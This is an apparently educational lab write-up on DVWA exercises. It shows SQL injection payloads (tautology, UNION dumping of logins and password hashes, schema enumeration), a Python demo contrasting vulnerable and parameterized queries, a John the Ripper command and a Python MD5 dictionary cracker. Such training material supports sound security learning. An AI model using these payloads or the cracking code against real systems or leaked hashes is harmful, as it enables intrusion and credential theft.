# DVWA Exercises 5

### 09 SQL Injection

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FaGFNnBZoQ1QE9cEne6Qn%2Fsqli01.png?alt=media&#x26;token=2a743f37-6cee-4121-b0c1-1b08e0ea2577" alt=""></div>

Here we can see an input field where we can enter a user id. The SQL statement in the background could look like this, with the `id` parameter (here `$id`, taken unchanged from the GET request) concatenated straight into the query string:

`select firstname,surname from users where uid='$id';`

Let's try to inject a SQL statement:

`1' or '1' = '1`

The first quote closes the string literal, `or '1' = '1` is always true, and the query's own trailing quote closes the last literal again, so the `WHERE` clause matches every row and all users are returned:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FtQlFNPP5jha4aaISNsBR%2Fsqli02.png?alt=media&#x26;token=11e75f87-bcce-4d09-bdc9-1db8c83ed3f7" alt=""></div>

### 10 SQL Injection with union

With a SQL `UNION` we can grab information from other tables.

The `UNION` keyword lets you execute one or more additional `SELECT` queries and append the results to the original query. For example:

```
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
```

This SQL query will return a single result set with two columns, containing values from columns `a` and `b` in `table1` and columns `c` and `d` in `table2`.

For a `UNION` query to work, two key requirements must be met:

* The individual queries must return the same number of columns.
* The data types in each column must be compatible between the individual queries.

Let's try the following SQL query:

```
%' or '0'='0' union select user,password from users #
```

`%'` closes the string literal, `or '0'='0'` makes the `WHERE` clause true for every row, and the `#` (a MySQL line comment) throws away the rest of the original query, including its trailing quote. The `UNION` selects exactly two columns because the original query returns two (the name columns the page displays), so the login names and password hashes show up in those fields:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FDQJOusCEvYZtncqp3ggB%2Fsqli03.png?alt=media&#x26;token=d72958b8-3cce-441f-baab-afd823e5c3d1" alt=""></div>

### 11 Further Database Enumeration

Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database.

You can query `information_schema.tables` to list the tables in the database:

```
SELECT * FROM information_schema.tables
```

You can then query `information_schema.columns` to list the columns in individual tables:

```
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
```

Let's try the following SQL query, which again returns two columns so that they line up with the two the page displays:

```
%' or '0'='0' union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS #
```

This lists every table and column the application's database user is allowed to see, not only those of the DVWA database:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2Fbfctl39jtd5oQfzNUn1p%2Fsqli04.png?alt=media&#x26;token=da9dc5d7-7a54-4141-9408-cc0afa1113d5" alt=""></div>
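The three injections above (the tautology, the `UNION` dump of logins and hashes, and the schema enumeration) reproduced against a throwaway database, as an added example that is not part of the original page. It uses Python's built-in `sqlite3` instead of DVWA's MySQL, with constructed sample rows that stand in for DVWA's `users` table. Two differences from DVWA are handled in the payloads: SQLite has no `#` line comment, so the payloads close the trailing quote with a tautology instead of commenting it out (this form also works on MySQL), and SQLite has no `information_schema`, so `sqlite_master` plays that role. The vulnerable lookup mirrors the guessed query from the first section; the parameterized lookup next to it is the fix.

```python
import hashlib
import sqlite3

# Constructed sample data standing in for DVWA's users table (not DVWA's real rows).
# DVWA stores unsalted MD5 hashes, so the hashes here are computed the same way.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "password"),
    (2, "Gordon", "Brown", "gordonb", "abc123"),
    (3, "Hack", "Me", "1337", "charley"),
]


def build_db():
    """Create an in-memory SQLite database shaped like DVWA's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, "
        "user TEXT, password TEXT)"
    )
    for uid, first, last, login, plain in SAMPLE_USERS:
        conn.execute(
            "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
            (uid, first, last, login, hashlib.md5(plain.encode()).hexdigest()),
        )
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors the guessed DVWA query: the id parameter is pasted into the SQL string."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """Same lookup with a bound parameter: the input can never change the query structure."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


# Payloads. DVWA runs MySQL, where '#' ends the line; SQLite has no '#' comment,
# so these close the trailing quote with a tautology instead, which works on both.
ALWAYS_TRUE = "1' or '1'='1"
DUMP_CREDS = "1' union select user, password from users where '1'='1"
# information_schema has no equivalent in SQLite; sqlite_master plays the same role here.
LIST_SCHEMA = "1' union select name, sql from sqlite_master where '1'='1"

if __name__ == "__main__":
    db = build_db()
    print(lookup_vulnerable(db, "1"))          # the intended single row
    print(lookup_vulnerable(db, ALWAYS_TRUE))  # every row
    print(lookup_vulnerable(db, DUMP_CREDS))   # names plus every login/hash pair
    print(lookup_vulnerable(db, LIST_SCHEMA))  # table name and its CREATE statement
    print(lookup_safe(db, ALWAYS_TRUE))        # [] because no row has that literal id
```

The `UNION` rows come back in the same two columns as the legitimate result, which is exactly why the page shows logins and hashes in the first-name and surname fields. With the bound parameter the same payload is compared as one opaque string against `user_id` and matches nothing.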

### 12 Crack the password hashes

I put the collected password hashes in a file (one per line; John also accepts `login:hash` lines and reports the login with each cracked password) and try to crack the passwords with John the Ripper.

First let's check which hash type we have with a tool called `hash-identifier`. DVWA stores unsalted MD5 hashes, 32 hex characters each, which is why the `raw-md5` format is used below:

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F38raPTBo7ndrEvAJB3D3%2Fjtr01.png?alt=media\&token=9b574745-e9ee-4f2e-b3d9-1d590e6809b8)

```
john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes.txt
```

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F89o8dBiCEpCxB1U0qEpF%2Fjtr02.png?alt=media\&token=847cde24-6f92-491a-a15a-9f07a99e9245)
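What John does in this wordlist mode, written out as an added example that is not part of the original page or of John the Ripper: each candidate word is hashed once and looked up against all targets, which is why unsalted MD5 is so cheap to attack. The login/hash pairs and the short wordlist are constructed here; the hashes are computed from the words in the code rather than copied from DVWA. `identify_md5` is a stand-in for the shape check `hash-identifier` performs.

```python
import hashlib

# Constructed sample input: login/hash pairs as they would come out of the UNION query
# (the hashes are MD5 of the words below, computed here, not copied from DVWA).
LEAKED = {
    "admin": hashlib.md5(b"password").hexdigest(),
    "gordonb": hashlib.md5(b"abc123").hexdigest(),
    "pablo": hashlib.md5(b"correct-horse-battery").hexdigest(),  # not in the wordlist
}

# A stand-in for rockyou.txt. A real wordlist is read line by line the same way
# (open it in binary mode: rockyou.txt is not clean UTF-8).
WORDLIST = ["123456", "password", "letmein", "abc123", "qwerty"]


def identify_md5(digest):
    """Cheap version of hash-identifier's check: 32 hex characters is the MD5 shape
    (MD4 and NTLM share it, so the check narrows the format, it does not prove it)."""
    return len(digest) == 32 and all(c in "0123456789abcdef" for c in digest.lower())


def crack_md5(hashes, wordlist):
    """Dictionary attack on unsalted MD5, as john --format=raw-md5 does: hash each
    candidate once and look it up against every target, so the cost is O(words),
    not O(words * hashes). Returns {login: plaintext} for every hash that was found."""
    targets = {}
    for login, digest in hashes.items():
        if not identify_md5(digest):
            raise ValueError(f"{login}: not a raw MD5 digest")
        # Several logins can share one hash (same password), so keep a list per digest.
        targets.setdefault(digest.lower(), []).append(login)
    cracked = {}
    for word in wordlist:
        candidate = hashlib.md5(word.encode()).hexdigest()
        for login in targets.get(candidate, []):
            cracked[login] = word
        if len(cracked) == len(hashes):
            break  # everything found, no need to read the rest of the wordlist
    return cracked


if __name__ == "__main__":
    for login, plain in crack_md5(LEAKED, WORDLIST).items():
        print(f"{login}:{plain}")
    # pablo is not printed: that password is not in the wordlist, so it stays uncracked.
```

The uncracked entry is the point to note when reading John's output: a hash that is missing from `john --show` has not been proven strong, only absent from the wordlist and rules that were tried.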
